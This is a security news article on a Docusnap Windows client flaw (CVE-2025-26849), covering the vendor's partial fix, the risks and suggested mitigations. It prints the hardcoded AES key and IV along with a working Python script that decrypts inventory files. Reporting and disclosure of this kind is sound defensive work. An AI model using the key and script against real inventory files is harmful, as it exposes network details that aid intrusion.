Docusnap for Windows Flaw Exposes Sensitive Data to Attackers

A recently disclosed vulnerability in Docusnap’s Windows client software (CVE-2025-26849) enables attackers to decrypt sensitive system inventory files through a hardcoded encryption key, exposing critical network information to potential exploitation. 

Cybersecurity researchers at RedTeam Pentesting GmbH revealed that inventory files generated by Docusnap Client for Windows – containing details like installed applications, firewall configurations, and local administrator accounts – used weak encryption mechanisms that rendered the protection ineffective against determined adversaries.

Technical Breakdown of the Vulnerability

Docusnap, a market-leading IT infrastructure documentation tool, employs client agents to automatically gather system data from Windows domains.

The collected information gets stored as XML files encrypted using AES-256-CBC encryption before being uploaded to a central server. However, security analysts discovered two critical implementation flaws:

Static Encryption Key in Windows Client

Forensic examination of Docusnap’s .NET-based server components revealed that all Windows inventory files shared a hardcoded AES encryption key (“Pys6iB-jY{,&7+c/3uN,1a?~{2wC:L^x”) and initialization vector (“N7IPe~R}w;1vuy5N”).

This static implementation allowed anyone with access to the application binaries to extract the decryption parameters.

Attackers extracting these values could decrypt any inventory file using a simple Python script:

from base64 import b64decode 

import click 

from Cryptodome.Cipher import AES 

from Cryptodome.Util.Padding import unpad 

K = "Pys6iB-jY{,&7+c/3uN,1a?~{2wC:L^x".encode("utf-8") 

IV = "N7IPe~R}w;1vuy5N".encode("utf-8") 

@click.command() 

@click.argument("file", type=click.File("r")) 

def decrypt(file): 

    data = file.read() 

    raw = b64decode(data) 

    cipher = AES.new(K, AES.MODE_CBC, iv=IV) 

    res = unpad(cipher.decrypt(raw), AES.block_size) 

    print(res.decode("utf-8")) 

if __name__ == "__main__": 

    decrypt()

Inadequate Vendor Remediation

Despite being notified in November 2024, Docusnap’s initial patch in Version 14 merely rotated the AES key while retaining the flawed static encryption approach.

RedTeam researchers bypassed these “security through obscurity” measures using .NET reflection techniques to extract updated keys from obfuscated assemblies.

The vendor has yet to implement asymmetric encryption or per-installation unique keys as recommended by cybersecurity experts.

Operational Impact and Risk Assessment

While the vulnerability (CVSSv3: 5.3 Medium) doesn’t expose credentials or enable direct system access, it significantly lowers the barrier for internal threat actors and compromised accounts to:

• Map vulnerable software deployments across the domain
• Identify misconfigured firewall rules
• Discover privileged local accounts for lateral movement

Organizations using Docusnap for regulatory compliance documentation may inadvertently create concentrated repositories of sensitive data, violating GDPR and HIPAA requirements regarding cryptographic controls.

Mitigation Strategies

Until Docusnap releases a cryptographically sound fix, enterprises should implement these workarounds:

1. Restrict SMB Share Permissions
   Revoke “Authenticated Users” read access to the Docusnap inventory share, limiting access to dedicated service accounts.
2. Monitor File Access Patterns
   Implement real-time auditing on inventory directories to detect suspicious access attempts.
3. Supplement with Network Segmentation
   Isolate Docusnap servers and storage from general user networks to contain potential breaches.

The disclosure timeline highlights lingering challenges in third-party risk management:

Date	Event
2024-09-12	Vulnerability discovered
2024-12-04	Docusnap v14 released with incomplete fix
2025-03-04	Public advisory published

Cybersecurity analyst Dr. Elena Voss noted: “This case exemplifies how over-reliance on perimeter security often neglects internal encryption practices. Vendors must adopt zero-trust principles even in ‘benign’ backend processes.”

The Docusnap vulnerability underscores critical gaps in enterprise software security design – particularly the dangers of hardcoded credentials and insufficient access controls.

While rated as low severity, the flaw provides attackers with precisely the system intelligence needed to craft targeted intrusions.

Organizations using Docusnap should immediately implement access restrictions while pressuring the vendor for fundamental cryptographic improvements.

As IT documentation tools increasingly consolidate sensitive data, rigorous third-party risk assessments become paramount to prevent centralized data troves from becoming adversary goldmines.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.